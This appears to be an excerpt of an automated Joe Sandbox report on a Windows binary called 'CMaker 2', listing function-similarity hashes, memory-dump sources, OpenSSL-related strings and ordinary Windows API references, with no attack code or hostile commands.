                                                                                                                                                                                  • API ID: 00007A43319ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 212611557-0
                                                                                                                                                                                  • Opcode ID: d5821aaf4936ad9aa18e348792a4e6496cc638c229f42c96d8f2983ca85ed40f
                                                                                                                                                                                  • Instruction ID: 18631bae99e1b9e3481645e35998dfb5f4bdfe06f9da2b1a21c46cde70fb2720
                                                                                                                                                                                  • Opcode Fuzzy Hash: d5821aaf4936ad9aa18e348792a4e6496cc638c229f42c96d8f2983ca85ed40f
                                                                                                                                                                                  • Instruction Fuzzy Hash: 49314F76709B8186EB709FA0E8603ED7378FB85744F454039DA4EA7A98DF38D548CB00
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
Memory Dump Source
• Source File: 00000005.00000002.2264373753.00007FFD935A1000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFD935A0000, based on PE: true
• Associated: 00000005.00000002.2264326565.00007FFD935A0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264373753.00007FFD93623000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264373753.00007FFD93625000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264373753.00007FFD9364D000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264373753.00007FFD93658000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264373753.00007FFD93663000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264633569.00007FFD93667000.00000080.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264772265.00007FFD93668000.00000004.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ffd935a0000_CMaker 2.jbxd
Similarity
• API ID: 00007B2246570
• String ID: ..\s\ssl\ssl_ciph.c$SECLEVEL=$STRENGTH$ssl_cipher_process_rulestr
• API String ID: 511975427-331183818
• Opcode ID: 84b29b3f3c5a8ddb94d30c590e50ba50e9e9283ac966815b6dbbe67d5f37e6b5
• Instruction ID: 68678667788ada7a826d6f4bdc5565767c9a92a50bb583cb3b0d2daf13eefddb
• Opcode Fuzzy Hash: 84b29b3f3c5a8ddb94d30c590e50ba50e9e9283ac966815b6dbbe67d5f37e6b5
• Instruction Fuzzy Hash: D9E1A472B0C6428AF7F28EA5946077A67F9FF48784F105035EA5D67AA4DB3CE941CB00
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
• Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
• String ID: %s\*
• API String ID: 1057558799-766152087
• Opcode ID: b1bbed1cfb60f4f0fc8f81c34b93851b936e7686d1867c24e24cc6b5744ead1d
• Instruction ID: e2c0f25f5076c5409287d8e48269d475fa46c619c7e9588e876b3a64e4750f28
• Opcode Fuzzy Hash: b1bbed1cfb60f4f0fc8f81c34b93851b936e7686d1867c24e24cc6b5744ead1d
• Instruction Fuzzy Hash: 40413E61A0CA4281EB609B24E4A42B97360FB95754F8046B2E9BEC37D4FF3CE54AC700
APIs
Memory Dump Source
• Source File: 00000005.00000002.2264373753.00007FFD935A1000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFD935A0000, based on PE: true
• Associated: 00000005.00000002.2264326565.00007FFD935A0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264373753.00007FFD93623000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264373753.00007FFD93625000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264373753.00007FFD9364D000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264373753.00007FFD93658000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264373753.00007FFD93663000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264633569.00007FFD93667000.00000080.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264772265.00007FFD93668000.00000004.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ffd935a0000_CMaker 2.jbxd
Similarity
• API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
• String ID:
• API String ID: 3140674995-0
• Opcode ID: a32b81c2ff6dfccb19a9728fe67c5763d4d0aea259f9004b58da64eb6530d66a
• Instruction ID: cf3be6a95c6f30d500e3723aa723d41fa69aa17fd93cf5c31c679511330c82e6
• Opcode Fuzzy Hash: a32b81c2ff6dfccb19a9728fe67c5763d4d0aea259f9004b58da64eb6530d66a
• Instruction Fuzzy Hash: 0F313972B09B818AEB709FE0E8603E97368FB84744F44443ADA9E57A98DF3CD548C700
APIs
Memory Dump Source
• Source File: 00000005.00000002.2266399755.00007FFD9DFC1000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFD9DFC0000, based on PE: true
• Associated: 00000005.00000002.2266316234.00007FFD9DFC0000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000005.00000002.2266399755.00007FFD9DFDA000.00000040.00000001.01000000.00000016.sdmp
• Associated: 00000005.00000002.2266399755.00007FFD9DFE2000.00000040.00000001.01000000.00000016.sdmp
• Associated: 00000005.00000002.2266691733.00007FFD9DFE3000.00000080.00000001.01000000.00000016.sdmp
• Associated: 00000005.00000002.2266751869.00007FFD9DFE5000.00000004.00000001.01000000.00000016.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ffd9dfc0000_CMaker 2.jbxd
Similarity
• API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
• String ID:
• API String ID: 3140674995-0
• Opcode ID: 79c755f0fa8e702774278d76ad584c934338be1500de2b5779589135aa72a969
• Instruction ID: 489f9d77b71616ecc5ecc61c34ddd4e2ae07ee9d7153c5ef54e42180d2e83bfe
• Opcode Fuzzy Hash: 79c755f0fa8e702774278d76ad584c934338be1500de2b5779589135aa72a969
• Instruction Fuzzy Hash: 6631FA62709AC185EB709FA0E8553ED73A4FB84744F44463ADB8E47A98EF3CD6488710
APIs
Memory Dump Source
• Source File: 00000005.00000002.2266983474.00007FFD9F3B1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFD9F3B0000, based on PE: true
• Associated: 00000005.00000002.2266842106.00007FFD9F3B0000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000005.00000002.2266983474.00007FFD9F3D0000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000005.00000002.2266983474.00007FFD9F3D9000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000005.00000002.2266983474.00007FFD9F3DD000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000005.00000002.2267323992.00007FFD9F3E0000.00000080.00000001.01000000.00000010.sdmp
• Associated: 00000005.00000002.2267409295.00007FFD9F3E2000.00000004.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ffd9f3b0000_CMaker 2.jbxd
Similarity
• API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
• String ID:
• API String ID: 3140674995-0
• Opcode ID: 95a6715441451f332765c81f1ec3e8738af08fa5e0456622ef6d16990be337b9
• Instruction ID: 94b7fbcc381c2e0490bcff71b6c1e367fa797eb19c44e9cbc754187a125278a1
• Opcode Fuzzy Hash: 95a6715441451f332765c81f1ec3e8738af08fa5e0456622ef6d16990be337b9
• Instruction Fuzzy Hash: E9311C72709A8185EB70AFA0E8603FA7365FB84745F44443EDA4E4BA99DF3CD649C710
APIs
Memory Dump Source
• Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
• Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
• String ID:
• API String ID: 3140674995-0
• Opcode ID: dec8059712e99081e2e259c55c2c48a2db8476306f1af611de12d5d4c368715b
• Instruction ID: 0045311956e5186c29c67de8a5ab8b0c4e4de97af8b213559da2212c99dbf03d
• Opcode Fuzzy Hash: dec8059712e99081e2e259c55c2c48a2db8476306f1af611de12d5d4c368715b
• Instruction Fuzzy Hash: 72312FB2618B818AEB60DF60E8943EA7374FB95744F44807ADA5E87B94EF38D548C710
APIs
                                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF6FAC05B45
                                                                                                                                                                                    • Part of subcall function 00007FF6FAC05498: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6FAC054AC
                                                                                                                                                                                    • Part of subcall function 00007FF6FABFA0E4: RtlFreeHeap.NTDLL(?,?,?,00007FF6FAC02B22,?,?,?,00007FF6FAC02B5F,?,?,00000000,00007FF6FAC03025,?,?,?,00007FF6FAC02F57), ref: 00007FF6FABFA0FA
                                                                                                                                                                                    • Part of subcall function 00007FF6FABFA0E4: GetLastError.KERNEL32(?,?,?,00007FF6FAC02B22,?,?,?,00007FF6FAC02B5F,?,?,00000000,00007FF6FAC03025,?,?,?,00007FF6FAC02F57), ref: 00007FF6FABFA104
                                                                                                                                                                                    • Part of subcall function 00007FF6FABFA4C4: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF6FABFA4A3,?,?,?,?,?,00007FF6FABFA38E), ref: 00007FF6FABFA4CD
                                                                                                                                                                                    • Part of subcall function 00007FF6FABFA4C4: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6FABFA4A3,?,?,?,?,?,00007FF6FABFA38E), ref: 00007FF6FABFA4F2
                                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF6FAC05B34
                                                                                                                                                                                    • Part of subcall function 00007FF6FAC054F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6FAC0550C
                                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF6FAC05DAA
                                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF6FAC05DBB
                                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF6FAC05DCC
                                                                                                                                                                                  • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6FAC0600C), ref: 00007FF6FAC05DF3
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 4070488512-0
                                                                                                                                                                                  • Opcode ID: 656f46ad94b1de9c6b7be9e0428065307f6ee6306168047b2f363e6a295c7c06
                                                                                                                                                                                  • Instruction ID: 574d03f9573c635930e5239bb9b16b5f15e172ee570f051b444e3a155a97edbd
                                                                                                                                                                                  • Opcode Fuzzy Hash: 656f46ad94b1de9c6b7be9e0428065307f6ee6306168047b2f363e6a295c7c06
                                                                                                                                                                                  • Instruction Fuzzy Hash: 97D1E0A6A1824686EB20DF25D4901B967B8FF84B84F84E076EA6DC76D5FF3CE441C740
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1239891234-0
                                                                                                                                                                                  • Opcode ID: 18bd89ddc904fac5e08f82f97f687fabcb8e5781267cf91c135aead5cf591e4d
                                                                                                                                                                                  • Instruction ID: 282429c43bfb8495d300850a47afc26408b8fa51c429091b6638823b427b164c
                                                                                                                                                                                  • Opcode Fuzzy Hash: 18bd89ddc904fac5e08f82f97f687fabcb8e5781267cf91c135aead5cf591e4d
                                                                                                                                                                                  • Instruction Fuzzy Hash: A9319176618F8186DB60CF25E8402AE73B4FB89754F544179EAAD83B98EF3CC545CB00
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2264373753.00007FFD935A1000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFD935A0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2264326565.00007FFD935A0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93623000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93625000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD9364D000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93658000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93663000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264633569.00007FFD93667000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264772265.00007FFD93668000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd935a0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: ..\s\ssl\statem\statem_srvr.c$construct_stateful_ticket$resumption$tls_construct_new_session_ticket
                                                                                                                                                                                  • API String ID: 0-1194634662
                                                                                                                                                                                  • Opcode ID: 72ef1a0d099f6e64caee48e151b3fdafe4a252f0948802915178ad43b1f83a31
                                                                                                                                                                                  • Instruction ID: e714a4371eeae393fda0a822b9479c2ba96c941cfbf10fd9110f0fe33fd25425
                                                                                                                                                                                  • Opcode Fuzzy Hash: 72ef1a0d099f6e64caee48e151b3fdafe4a252f0948802915178ad43b1f83a31
                                                                                                                                                                                  • Instruction Fuzzy Hash: 36D19036B0868285FB60DBE5D8606ED6B68EB89B84F480036DE5CA7796DF7CE541C310
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2227656907-0
                                                                                                                                                                                  • Opcode ID: dcffd9b8628d742c69489f875bc55e6d9247fa9d8bf2a4278b728192fca35700
                                                                                                                                                                                  • Instruction ID: 322b19d1c11ebc6131e38ace58e48e1b45154e7484a475e23d55f8037a77ad21
                                                                                                                                                                                  • Opcode Fuzzy Hash: dcffd9b8628d742c69489f875bc55e6d9247fa9d8bf2a4278b728192fca35700
                                                                                                                                                                                  • Instruction Fuzzy Hash: F5B1D5A6B1868281EB64DB65E4001BAA3B0EF44FE4F44A275DA6DC7BC5FE3CE541C300
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2266983474.00007FFD9F3B1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFD9F3B0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2266842106.00007FFD9F3B0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2266983474.00007FFD9F3D0000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2266983474.00007FFD9F3D9000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2266983474.00007FFD9F3DD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2267323992.00007FFD9F3E0000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2267409295.00007FFD9F3E2000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9f3b0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Cert$Store$ErrorLast$00007CertificateCertificatesCloseContextEnhancedEnumFreeOpenUsage
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1905439668-0
                                                                                                                                                                                  • Opcode ID: 026a14245fef453ce3d65f29d84bb8553a0a4b30dbea44e5e557f8660a976952
                                                                                                                                                                                  • Instruction ID: 5871834bbc3bf9ae54882d00e1f90cbd06d180f5d7cc492ca94e7ed66a0f6efb
                                                                                                                                                                                  • Opcode Fuzzy Hash: 026a14245fef453ce3d65f29d84bb8553a0a4b30dbea44e5e557f8660a976952
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8761C671F1DA1286FE79BBF1997413963A0AF55BA2F09443CCD4E0EB90DE3DA9459300
APIs
Memory Dump Source
• Source File: 00000005.00000002.2266983474.00007FFD9F3B1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFD9F3B0000, based on PE: true
• Associated: 00000005.00000002.2266842106.00007FFD9F3B0000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000005.00000002.2266983474.00007FFD9F3D0000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000005.00000002.2266983474.00007FFD9F3D9000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000005.00000002.2266983474.00007FFD9F3DD000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000005.00000002.2267323992.00007FFD9F3E0000.00000080.00000001.01000000.00000010.sdmp
• Associated: 00000005.00000002.2267409295.00007FFD9F3E2000.00000004.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ffd9f3b0000_CMaker 2.jbxd
Similarity
• API ID: Cert$Store$00007CloseContextEnumErrorFreeLastOpen
• String ID:
• API String ID: 966150261-0
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.2264373753.00007FFD935A1000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFD935A0000, based on PE: true
• Associated: 00000005.00000002.2264326565.00007FFD935A0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264373753.00007FFD93623000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264373753.00007FFD93625000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264373753.00007FFD9364D000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264373753.00007FFD93658000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264373753.00007FFD93663000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264633569.00007FFD93667000.00000080.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264772265.00007FFD93668000.00000004.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ffd935a0000_CMaker 2.jbxd
Similarity
• API ID: 00007B22408
• String ID: ..\s\ssl\statem\extensions_srvr.c$D:\a\1\s\include\internal/packet.h$tls_parse_ctos_psk
• API String ID: 4199793457-3130753023
APIs
• _get_daylight.LIBCMT ref: 00007FF6FAC05DAA
  • Part of subcall function 00007FF6FAC054F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6FAC0550C
• _get_daylight.LIBCMT ref: 00007FF6FAC05DBB
  • Part of subcall function 00007FF6FAC05498: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6FAC054AC
• _get_daylight.LIBCMT ref: 00007FF6FAC05DCC
  • Part of subcall function 00007FF6FAC054C8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6FAC054DC
  • Part of subcall function 00007FF6FABFA0E4: RtlFreeHeap.NTDLL(?,?,?,00007FF6FAC02B22,?,?,?,00007FF6FAC02B5F,?,?,00000000,00007FF6FAC03025,?,?,?,00007FF6FAC02F57), ref: 00007FF6FABFA0FA
  • Part of subcall function 00007FF6FABFA0E4: GetLastError.KERNEL32(?,?,?,00007FF6FAC02B22,?,?,?,00007FF6FAC02B5F,?,?,00000000,00007FF6FAC03025,?,?,?,00007FF6FAC02F57), ref: 00007FF6FABFA104
• GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6FAC0600C), ref: 00007FF6FAC05DF3
Memory Dump Source
• Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
• Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
• String ID:
• API String ID: 3458911817-0
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.2264373753.00007FFD935A1000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFD935A0000, based on PE: true
• Associated: 00000005.00000002.2264326565.00007FFD935A0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264373753.00007FFD93623000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264373753.00007FFD93625000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264373753.00007FFD9364D000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264373753.00007FFD93658000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264373753.00007FFD93663000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264633569.00007FFD93667000.00000080.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264772265.00007FFD93668000.00000004.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ffd935a0000_CMaker 2.jbxd
Similarity
• API ID: 00007B22408
• String ID: ..\s\ssl\statem\extensions_clnt.c$tls_construct_ctos_psk
• API String ID: 4199793457-446233508
APIs
Strings
• Cannot create a server socket with a PROTOCOL_TLS_CLIENT context, xrefs: 00007FFD9F3BB702
• Cannot create a client socket with a PROTOCOL_TLS_SERVER context, xrefs: 00007FFD9F3BB749
Memory Dump Source
• Source File: 00000005.00000002.2266983474.00007FFD9F3B1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFD9F3B0000, based on PE: true
• Associated: 00000005.00000002.2266842106.00007FFD9F3B0000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000005.00000002.2266983474.00007FFD9F3D0000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000005.00000002.2266983474.00007FFD9F3D9000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000005.00000002.2266983474.00007FFD9F3DD000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000005.00000002.2267323992.00007FFD9F3E0000.00000080.00000001.01000000.00000010.sdmp
• Associated: 00000005.00000002.2267409295.00007FFD9F3E2000.00000004.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ffd9f3b0000_CMaker 2.jbxd
Similarity
• API ID: 00007D935
• String ID: Cannot create a client socket with a PROTOCOL_TLS_SERVER context$Cannot create a server socket with a PROTOCOL_TLS_CLIENT context
• API String ID: 1878651150-1683031804
APIs
• GetProcAddress.KERNEL32(?,00007FF6FABE4EB7,?,00007FF6FABE224E), ref: 00007FF6FABE42F0
• GetProcAddress.KERNEL32(?,00007FF6FABE4EB7,?,00007FF6FABE224E), ref: 00007FF6FABE4331
• GetProcAddress.KERNEL32(?,00007FF6FABE4EB7,?,00007FF6FABE224E), ref: 00007FF6FABE4356
• GetProcAddress.KERNEL32(?,00007FF6FABE4EB7,?,00007FF6FABE224E), ref: 00007FF6FABE437B
• GetProcAddress.KERNEL32(?,00007FF6FABE4EB7,?,00007FF6FABE224E), ref: 00007FF6FABE43A3
